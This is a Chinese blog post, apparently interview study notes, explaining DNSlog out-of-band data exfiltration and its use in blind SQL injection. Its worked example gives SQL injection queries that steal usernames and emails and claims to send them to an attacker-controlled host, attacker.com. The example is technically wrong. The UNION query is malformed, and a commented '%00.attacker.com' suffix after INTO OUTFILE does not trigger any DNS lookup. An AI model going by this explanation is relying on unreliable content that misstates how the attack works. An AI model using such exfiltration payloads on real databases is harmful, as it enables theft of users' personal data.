dnslog外带是什么

于 2024-05-14 14:24:19 发布
阅读量1k 收藏 26
点赞数 13
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62467948/article/details/138853828
版权

前言

在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。

正文

DNSlog是什么?

要回答这个我们需要先清楚,DNS:(Domain Name System)域名系统,负责把域名转换成IP地址。那么dnslog就是

DNS的日志,就是存储在DNS Server上的域名访问信息,它记录着用户对域名littlehann.com等的访问信息,类似日志文件。

DNSlog外带原理

DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到自己这里,然后通过读日志获取信息。也就是在一些网站通过dns请求后,通过读取日志来获取我们的请求信息。可能有点难以理解

我们换一种说法dnslog外带是指利用 DNS 查询来实现数据传输或者执行远程命令的技术。这种技术的基本原理是将数据嵌入到 DNS 查询中,然后将其发送到一个能够捕获 DNS 查询的服务器上,最后解析查询以获取嵌入的数据。

DNSlog 外带通常用于绕过网络安全防御,因为 DNS 查询通常允许通过防火墙,且大多数网络都允许 DNS 查询的出站流量。这使得攻击者可以利用 DNS 查询来传输数据或执行恶意操作,而不容易被检测到。

DNSlog注入

既然能够嵌入一些数据那么,就能想到注入,dns注入常被用在dnslog通常用在:

 1.SQL盲注
 2.无回显的XSS
 3.无回显的命令执行
 5.无回显的SSRF
 5.Blind XXE

mysql-DNSlog外带注入

当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。

首先首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 secure_file_priv特性,有三种状态 secure_file_priv为null 表示不允许导入导出 secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹 secure_file_priv没有设置时,则表示没有任何限制 可了解一下load_file和outfile

show variables like ‘%secure%’;查看load_file()可以读取的磁盘。

有路径或为null 的 则不可以进行 DNSlog 外带

利用 DNS 查询来执行数据传输的技术,通常用于在利用 MySQL 数据库中的注入漏洞时,将数据从受感染的数据库中提取出来,并将其发送到攻击者控制的 DNS 服务器上。

假设有一个在线商店的网站,该网站使用 MySQL 数据库存储用户的订单信息。该网站的搜索功能存在 SQL 注入漏洞,攻击者可以在搜索框中注入恶意的 SQL 代码,并执行恶意的查询。攻击者想要窃取所有订单的用户名和电子邮件地址。

攻击者可以构造以下恶意的 SQL 查询来实现这一目的:

 sql
 Copy code
 SELECT username, email FROM orders UNION SELECT NULL, concat(username, '||', email) FROM users--

这个查询将从订单表中选择用户名和电子邮件地址,并与来自用户表的空结果集进行联合。在联合的结果中,攻击者使用 concat() 函数将用户名和电子邮件地址连接成一个字符串,并在它们之间插入特殊分隔符(例如 ||)。攻击者通过这种方式将订单信息与用户信息合并到同一个结果集中。

现在,攻击者需要将这些数据发送到他们控制的 DNS 服务器上。为此,攻击者可以在恶意的 SQL 查询中嵌入 DNS 查询。假设攻击者控制的 DNS 服务器是 attacker.com,那么攻击者可以构造以下 DNS 查询来发送数据:

 sql
 Copy code
 SELECT username, email FROM orders UNION SELECT NULL, concat(username, '||', email) FROM users INTO OUTFILE '/var/www/html/payload.txt'; -- %00.attacker.com

在这个查询中,INTO OUTFILE 子句将查询结果写入到服务器上的一个文件中,例如 payload.txt。然后,攻击者在查询的末尾添加一个恶意的 DNS 后缀(在本例中是 %00.attacker.com),这样查询结果将被发送到 attacker.com 的 DNS 服务器上。

当数据库服务器执行这个查询时,它会将查询结果写入到 payload.txt 文件中,并尝试解析 DNS 查询 attacker.com。攻击者的 DNS 服务器将收到这个查询,并从查询中提取订单信息,从而完成数据的传输。

参考

本文在书写的时候借鉴了以下师傅的相关的文章

dnslog外带注入

DNSlog外带

JaSun9
关注
  • 13
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
咖啡外带盒PSD样机
07-31
"咖啡外带盒PSD样机"是一款专为咖啡杯设计准备的资源,可以帮助设计师高效地展示他们的创意,尤其是在包装设计阶段。 这款样机以PSD(Photoshop Document)格式提供,这是Adobe Photoshop软件的标准文件格式,意味...
DNSlog外带
adaosanqian的博客
02-28 7429
减轻盲注的复杂操作,运用DNSlog外带来进行操作
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
SQL注入之DNSLog外带注入
最新发布
dragon的博客
02-21 2647
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 1862
创新蓝队-针对DNSlog数据外带攻击的应急与预防
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 761
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
DNS外带注入
weixin_52501704的博客
10-09 1474
DNS外带注入
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1424
盲注代替 DNS logDNS日志,域名解析的记录。
外带餐:送餐申请
02-09
标题“外带餐:送餐申请”看似与IT行业关联性不大,但在这个数字化的时代,很多日常生活中的场景都与技术紧密相连。这个标题可能是指一个餐饮行业的送餐管理系统或者应用程序的功能模块,允许用户在线提交外带餐的...
takeaway:外带任务
03-29
在家工作 作业2.1 内容 首先,我们作为此存储库的一部分提供: . ├── auth Default Port: 9180 To start use: mvn spring-boot:run ├── eureka Default Port: 8761 To start use: mvn spring-boot:run ...
公章外带申请表.pdf
11-28
"公章外带申请表"是用来规范公章临时外出使用的流程,确保公章的安全和合法使用。以下是关于公章管理及相关流程的一些关键知识点: 1. **公章管理**:公章通常由企业指定的专人或部门负责保管,如行政部或财务部。...
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2654
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
写bat脚本双击执行
qq_35911118的博客
04-08 2761
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
DNS外带数据结合sqlmap
S_cx666的博客
08-09 612
DNS外带数据结合sqlmap
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 5090
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
【sql注入】sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 2008
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显你觉得是什么原因?
05-21
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显,可能有以下一些原因: 1. 防火墙阻止了发出的 ICMP 包或者 DNS 请求,导致无法连接到 DNSLog。 2. DNSLog 服务器已经宕机或者 DNSLog 的 URL 不正确,无法接收到数据。 3. payload 中执行的命令有误,导致无法正常执行 whoami 命令。 4. 可能被目标系统拦截或者防御措施拦截,导致无法正常返回结果。 需要进一步排查确定具体的原因。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值